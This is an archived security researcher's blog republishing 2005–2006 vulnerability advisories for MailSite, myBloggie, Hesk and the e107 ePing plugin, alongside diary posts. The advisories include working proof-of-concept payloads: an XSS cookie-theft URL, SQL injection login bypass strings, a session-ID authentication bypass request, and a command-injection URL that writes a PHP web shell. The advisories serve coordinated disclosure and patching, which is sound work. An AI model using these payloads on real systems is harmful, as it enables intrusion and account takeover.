News from the Lab

I am Moving!

2007-12-10T15:53:00.000+05:30

I am moving, the reincarnated website can be found at

http://rahulmohandas.wordpress.com/

Hacking the Malware– A reverse-engineer’s analysis

2006-10-16T19:38:00.000+05:30

ABSTRACT

This paper attempts to document an approach on how the hackers make use of the vulnerabilities to install malicious software on the vulnerable machine. A comprehensive reverse code engineered analysis of the malicious software (Win32.Qucan.a) and the various protection schemes against the worm by various security products are also discussed.

I hope this document will help the Malware researchers, Intrusion Analysts and other Security professionals to conduct a more viable and comprehensive research.

The complete paper can be downloaded from
http://geocities.com/rahulmohandas/hacking_the_malware.pdf

MD5: F875DADCAD00792D753CC96BD57E0F72

http://websamba.com/forever_rahul/hacking_the_malware.zip

MD5(zip file): 5562F1A86DDC447A14D7763FF4C8D85D

RockLiffe MailSite wconsole.dll Denial of Service/Script Injection Vulnerability

2006-10-16T18:08:00.000+05:30

OS2A ID: OS2A_1004 Status
01/06/2006 Issue Discovered
01/06/2006 Reported to the vendor
01/19/2006 Patch Released
01/20/2006 Advisory Released

Class: Denial of Service / Script Injection Severity: CRITICAL

Overview:
Rockliffe's MailSite is a program for providing access to email
accounts on Microsoft Windows operating systems. MailSite HTTP Mail management
agent could allow a remote attacker to cause a denial of service or
execute arbitrary script code.

Description:
1. MailSite HTTP Mail management agent 7.0.3.1 version could allow a remote
attacker cause a denial of service. A bug in the input validation routine
in httpma causes the svchost process to consume more CPU cycles thus
impacting Mailsite HTTP Management agent and ultimately crashing the service.

2. MailSite HTTP Mail management agent 6.x and 5.x could allow a remote
attacker to inject arbitrary script code. This vulnerability is caused
due to a design error in the wconsole.dll. This dll file contains html
code embedded in it which is not properly sanitizing the user-input.

Impact:
1. Remote attackers can exploit this issue to trigger a denial of service
condition.
2. An attacker may leverage this issue to have arbitrary script code
executed in the browser in the context of the affected site.

Affected Software(s):
MailSite 7.0.3.1 and prior
MailSite 6.1.22 and prior
MailSite 5.x

Affected platform(s):
Windows (Any)

Exploit/Proof of Concept:
For 7.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?Authenticate|cmd
Any special characters passed to the parameters in the wconsole.dll
triggers denial of service.

For 6.x & 5.x series
http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert
(document.cookie)%3C/script%3E

Solution:
For 7.x series apply the following patch.
ftp://ftp.rockliffe.com/MailSite/Latest/Hotfixes/

For 6.x series apply the following patch
ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/

Reference:
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0750.html

myBloggie SQL Injection/Privilege Escalation Vulnerability

2006-10-16T17:58:00.000+05:30

OS2A ID: OS2A_1002

Status
9/1/2005 Issue Discovered
9/2/2005 Reported to the vendor
9/3/2005 Patch Released
9/5/2005 Advisory Released


Class: SQL Injection    Severity: CRITICAL


Overview:
myBloggie is a Weblog system built using PHP & mySQL. myBloggie
versions2.1.3-beta and prior are vulnerable to SQL injection vulnerability
causedby improper validation of user-supplied inputs. This vulnerability
can be exploited to bypass authentication mechanism, escalate the
privileges toadministrator level and also made to reveal system
specific information.


Description:
User supplied credential inputs ('$username' and '$passwd') are not
sanitized in login.php before subjecting them to SQL query.

<-------------------login.php snippet----------------------------->

if (isset($_POST['username'])) {
$username=$_POST['username'];
} else $username="";

$result = mysql_query( "SELECT user FROM ".USER_TBL." WHERE user=
'$username'    AND password='$passwd'" ) or error( mysql_error() );

<----------------------------------------------------------------->

This can be exploited in multiple ways,
1. Authentication Bypass
A malicious user can log on to the weblog system without submitting
thepassword by placing queries such as this "admin' OR 'x'='x" in
the User Name field.

2. Privilege Escalation.
When a non-administrative user submits, for example "user1' OR 'x'='x"
into the User Name field, administrative privileges will be granted.

3. Path Disclosure.
Path information can be made to disclose in error pages by passing
invalid query to User Name field of login.php.


Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information, or permit an attacker to
exploit vulnerabilities in the underlying database implementation.
An attacker can also exploit this vulnerability to elevate privileges
within the affected system.

Affected Systems:
myBloggie 2.1.3-beta and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. POST http://example.com/mybloggie/login.php?username=admin' OR
'x'='x
2. POST http://example.com/mybloggie/login.php?username=normal_user
' OR 'one'='one
3. POST http://example.com/mybloggie/login.php?username='1=1 --

Solution:
Patch: http://mywebland.com/forums/showtopic.php?t=399

Reference:
http://marc.theaimsgroup.com/?l=bugtraq&m=112607358831963&w=2

Hesk Session ID Validation Vulnerability

2006-10-16T17:53:00.000+05:30

OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released

Class: Authentication Bypass Severity: CRITICAL

Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused due to improper validation of the HTTP
header. This vulnerability can be exploited to bypass authentication
mechanism, and also made to reveal system specific information.

Description:
Multiple vulnerabilities exist in Hesk ticket based support system.

1. Authentication Bypass
The 'PHPSESSID', Session ID parameter in the HTTP header is not properly
validated. A malicious user can log in to the Administrator account by
sending a random value to 'PHPSESSID' parameter and posting it to
admin.php. This Session ID can then be utilized to access administrative
control panel.

This is similar to a previously reported vulnerability where invalid
User ID and Password were submitted. In this case, a randomly chosen
Session ID is sent along with the login request.

2. Path Disclosure.
Path information can be made to disclose in error pages by passing invalid
metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.

Impact:
Successful exploitation can result in a compromise of the application,
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://host_ip/hesk/admin.php
Cookie: PHPSESSID=12345
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345")

Solution:
Patch:
http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
OR Hesk 0.93.1 from
http://www.phpjunkyard.com/free-helpdesk-software.php

Reference:

http://seclists.org/bugtraq/2005/Sep/0242.html

ePing Arbitrary File CreationCommand Execution Vulnerability

2006-10-16T17:13:00.000+05:30

OS2A ID: OS2A_1001    Status      Published: 08/04/2005 
Updated  : 08/05/2005
Patch Released

Class: File Creation/Command Execution
Severity: CRITICAL

Overview:
ePing is a ping utility plugin for e107, a PHP-based content
management system that uses a MySQL backend database. ePing
versions 1.02 and prior are vulnerable to a file creation
vulnerability caused by improper validation of user-supplied
input in the doping.php script. A remote attacker exploiting
this vulnerability could then create an arbitrary file in the
webserver, pipe multiple system commands in the eping_host
or the eping_count parameters of the doping.php script, which
would be executed within the security context of the hosting
site.


eTrace, another utility plugin for e107 has similar
vulnerabilities.

Description:
e107 portal's eping plugin 1.02 and prior is prone to remote
command execution vulnerability. This vulnerability exists
due to output redirection operators like '>', '|', '&' are
not being sanitized in eping_host,eping_count parameters in
the doping.php script.

eping_host has a validate function in functions.php which does
not consider the above mentioned case.

eping_count has no validation logic. It accepts the above
mentioned system meaningful characters.


Impact:
A remote user can execute any command using '|' character or
create a file with malicious executable code with '>' character.
Execution of arbitrary command or creation of arbitrary files
can lead to, Denial of service, Disclosure or modification of
system information or Execution of arbitrary code.


Affected Systems:
ePing version 1.02 and prior
Linux (Any), Unix (Any), Windows (Any)


Exploit:

a.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd
.exe%94)?%3E%22%20%3Etest.php

b.
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping
%20-n&eping_host=127.0.0.1&eping_count=2|dir


Solution:
Patch:
Upgrade to the version 1.03 of ePing and eTrace plugins.

Reference:
http://marc.theaimsgroup.com/?l=bugtraq&m=112328161319148&w=2

Another week!!

2006-01-11T16:01:00.000+05:30

Anyways the second week since i started with my blog, glad to quote that i succesfully completed the research on Mailsite. Atlast another of OS2A's advisories, the fourth one infact.
Dissected various dll files of Mailsite, what captured my attention was the wconsole.dll, very unusual a dll file is exposed to the user as it is , initial analysis was a cross-scripting vulnerability in Mailsite which was obvious as the HTML code was embedded in the dll file and whatever script is inserted into the GET request
it is executing in the returning HTMl page response.
Now i downloaded the latest series of Mailsite,(7.0.3) performed the same kind of analysis on the dll files, this time a different observation :-) . Mailsite is not properly sanitizing the input parameters to the GET request
Can you believe what happened?
Yup, a buffer overflow in the HTTPMA service. It causes the svchost process to consume entire cpu cycles
and ultimately crashed the service.A denial of service, the first one of its kind from me.

Contacted the vendor, waiting them to release the fixes, can't wait to get my advisory out.....

2006-01-05T12:01:00.000+05:30

A cool Thursday, late to office, started with the environment setup of my routine tasks,
Got a cisco task to work on. The mailsite express vulnerability i been researching on is still pending.
Initial observation shows a denial of service in the 7.x series of the mail agent, but a cross-site scripting vulnerability in 7.x, 6.x and 5.x versions are evident.
Can't wait to get this done :-)

RAHUL's Blog

2006-01-04T13:49:00.000+05:30

Welcome to my blog, guys !!! This blog is here to keep track of my interests in the security space...Have a nice time....